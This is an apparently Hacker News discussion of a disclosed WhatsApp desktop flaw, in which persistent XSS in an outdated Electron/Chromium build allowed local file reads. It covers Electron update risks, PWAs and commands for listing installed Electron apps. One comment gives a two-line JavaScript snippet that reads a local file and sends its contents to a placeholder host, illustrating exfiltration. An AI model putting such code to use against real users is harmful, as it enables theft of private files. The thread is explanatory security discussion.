
I found a WhatsApp security flaw that allowed hackers to read the file system - ccmpx
https://www.perimeterx.com/tech-blog/2020/whatsapp-fs-read-vuln-disclosure/
======
oarsinsync
> If you're going to use Electron, you HAVE to make sure it is updated with
> each update of Chromium.

I never really thought about this, but in retrospect, this is so blindingly
obvious, and is almost certainly a potential exploit vector to a wide range of
electron-based apps.

~~~
lima
It sure is. This is why Chrome apps and progressive web apps are great - they
share the Chrome runtime and inherit its hardening, security properties and
updates.

Many Electron apps should just be a PWA instead, and many actually are. Why
would I want to install a desktop app for WhatsApp? It runs just fine in
Chrome, and using More Tools -> Create shortcut..., you can even create a
launcher entry that will launch the page in its own window.

~~~
vbezhenar
How do I build installer for Chrome PWA? Like if user does not have Chrome, it
should install it. Also i don't want to bother user with that implicitly
installed chrome, so it should not add shortcuts, etc and just live as an app
launcher.

~~~
onei
Turns out a PWA works in Firefox too [1] so I'm not sure it's entirely
necessary to force a user to install a browser just for your app. Edge is/will
be chromium, so I guess Safari is the only major browser to worry about?

[1] [https://blog.mozilla.org/firefox/progressive-web-apps-
whats-...](https://blog.mozilla.org/firefox/progressive-web-apps-whats-big-
deal/)

------
dep_b
Skype, Slack and WhatsApp are using 250MB each on my machine to do something
that was already possible on my 64MB RAM machine 20 years ago. And on top of
that they're running one of the easiest hackable runtimes ever. Sure it's fun
to mess a bit with a website and remove nag screens here and there but for an
application that is expected to have a trusted encryption system it's just
ridiculous.

I hope the pendulum swings back again and we'll see companies start to use
cross-platform Rust libraries in some kind of way. I can't imagine you can't
reuse 80% of the code that powers those applications in any other way than
using some kind of Javascript engine. And perhaps we can just compile it to
web using webassembly?

------
voicedYoda
I'm strongly opposed to apps that are just wrappers for web services. I don't
need a wrapper when i could just open a browser i trust patches their
vulnerabilities (nod to Firefox). Every electron app eats so much RAM, it's
stupid. And in the end, I'm just using a browser making API calls, why do i
need the wrapper?

~~~
vojta_letal
I thought so as well - up until yesterday when I tried desktop version of
Microsoft Outlook. Such an awful experience. Just trying to pick an available
meeting room was surprisingly more difficult than on the modern web. And I can
hardly see how even Microsoft could bring the web experience to desktop in the
future without somehow leveraging the existing online version.

~~~
alxlaz
> I tried desktop version of Microsoft Outlook. Such an awful experience. Just
> trying to pick an available meeting room was surprisingly more difficult
> than on the modern web.

That has nothing to do with Electron. You can totally bork an UI on the
"modern web", too. There's nothing stopping the Outlook team from porting the
old room picking interface to the web version.

I've only used the Outlook web app as a fallback (at $work it used to be
available using 2FA, and I'd use it if I needed to check my email real quick
but didn't have my laptop -- and, thus, "real" Outlook -- with me) so maybe
it's an exception. But most of the time I really wish people would stop trying
to bring the web experience to desktop :).

------
dmurray
He didn't really demonstrate how "hackers" could read the file system, right?
The screenshot of etc/hosts is on the same computer where that hosts file
lives.

> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you
> just need to find a published one and use it through the persistent XSS
> found earlier and BAM: Remote Code Execution ACHIEVED!

> I did not take the time to actually exploit a public RCE

The XSS vulnerability is serious and looks fully deserving of a bug bounty.
Likewise, using an old version of Electron is asking for trouble. But for me
this PoC should include the extra step of "just" exploiting one of the RCE
holes he's sure must exist.

~~~
JoshTriplett
> He didn't really demonstrate how "hackers" could read the file system,
> right? The screenshot of etc/hosts is on the same computer where that hosts
> file lives.

If you can fetch arbitrary URLs, and the contents of local files, you can
trivially exfiltrate the latter with the former. Just fetch the local file,
then fetch an URL that encodes the contents of the local file.

    
    
        var text = fetch("/local/secret/file");
        fetch("https://example.org/"+encode(text));

~~~
dmurray
Yes, that's right of course, I had missed that he almost certainly can request
arbitrary remote URLs.

------
fouc
Is there a good way to identify all Electron apps installed on my computer?

~~~
guessmyname
(macOS) Use this command to list all applications with Electron as a
dependency:

    
    
      ls -1d -- /Applications/*.app/Contents/Frameworks/Electron\ Framework.framework
    

(linux) You can also search for any folder called "app.asar" or
"app.asar.unpacked"

(windows) You can also reverse the process used to package an app:
[https://www.electronjs.org/docs/tutorial/application-
distrib...](https://www.electronjs.org/docs/tutorial/application-distribution)

~~~
PappaPatat
Guess this is typical for a lot of us:

/Applications/Discord.app/Contents/Frameworks/Electron Framework.framework
/Applications/Etcher.app/Contents/Frameworks/Electron Framework.framework
/Applications/Twitch.app/Contents/Frameworks/Electron Framework.framework

~~~
fouc
DueFocus.app Keybase.app Marp.app Mullvad VPN.app Postman.app Skype.app
Slack.app Visual Studio Code.app WhatsApp.app

------
kjaftaedi
Very nice work! Also curious what kind of bounty was paid out for this.

~~~
luckydata
half of Jeff Bezos' net worth.

~~~
yoz-y
Important to note that this flaw only affects the desktop version of WhatsApp.
Which is not what Bezos was using.

~~~
bitL
There was (is?) obviously an issue with mobile WhatsApp and local file access
(perhaps different in nature to desktop one) and the joke was just too good.

------
wiredfool
Wonder what other electron apps have issues like this, or at least did until
they quickly updated their electron version.

~~~
projectdelphai
Just checked my discord client right now and it's using Chrome 69 through
Electron 4.0.8. Haven't had a chance to check a desktop version of Slack yet.

------
Dinux
I'm a heavy WhatsApp user and I feel like WhatsApp has gone downhill ever
since Facebook took over. Performance is down significantly, I experience a
lot more visible bugs, more and more exploits are being revealed about
seemingly trivial components (file encryption, browser XSS), and useless
features are beeing added. Its not like WhatsApp Inc. was flawless before they
got acquired, but at least it worked well and most of the developers
_actually_ wanted to make a great chat app.

Its just a matter of time before Facebook merges WhatsApp with its Messenger
(and keep either of those names).

~~~
Stubb
Signal and Telegram are both solid alternatives built around different
security models. When I get a notification in Messenger, Instagram, etc., I
simply reply back with my contact info for those apps. Telegram gives you a
vanity URL using your username, which is pretty cool.

~~~
Dinux
Yes I am using Signal. It's just that most people around me are not on Signal.
Trying to convince them to switch is useless (although I try). WhatsApp is not
my first choice either.

~~~
_jal
Tell them no.

My perspective is, pick one of the many overlapping channels we already share
or don't bother me. I am not signing up to yet another spyware-of-the-month
app in order to chase your fashion sense.

~~~
meowface
They would say the same of you, from their perspective. It's like someone
asking you for your Twitter and you replying that you only use Mastodon.

~~~
_jal
If I only used Mastodon or some other low-user-count service, you would have a
point. Instead, what I said was,

> pick one of the many overlapping channels we already share

~~~
meowface
True. I think I was somewhat conflating your post with the parent's.

------
everlost
Does anyone know if this was the vulnerability used to hack into Bezos' phone?

------
h1fra
wow, testing for `alert()` in a javascript environment is like the first thing
you learn. Feels bad for whatsapp engineers :/

~~~
pfundstein
These flaws are such basic security 101 issues, I hate to think how many more
better hidden issues exist.

------
imvetri
TLDR: 1\. Altering the text of someone else’s reply. 2\. Altering banner image
of someone else's reply containing links. 3,4,5. Good.

------
kome
i'm starting to think that Durov was right after all...

------
mrnobody_67
This is probably how the Saudi's got the data off Jeff's phone...

~~~
boring_twenties
You think Bezos was running the desktop/Electron app on his phone?

~~~
Dinux
He could have used the OSX desktop app. But the Bezos thing seems to be
unrelated (as far as I can tell).

------
akerro
How come that WhatsApp has so many security flaws recently and Signal isn't
affected? This cannot be coincidence right? Signal has less people working on
it, no massive corporation behind the product, more people as smart as Moxie
working on it. I don't believe these flaws are just bugs... Right?

~~~
bhaavan
What is the basis of the assertion that "Signal isn't affected"? Do you track
CVEs for Signal?

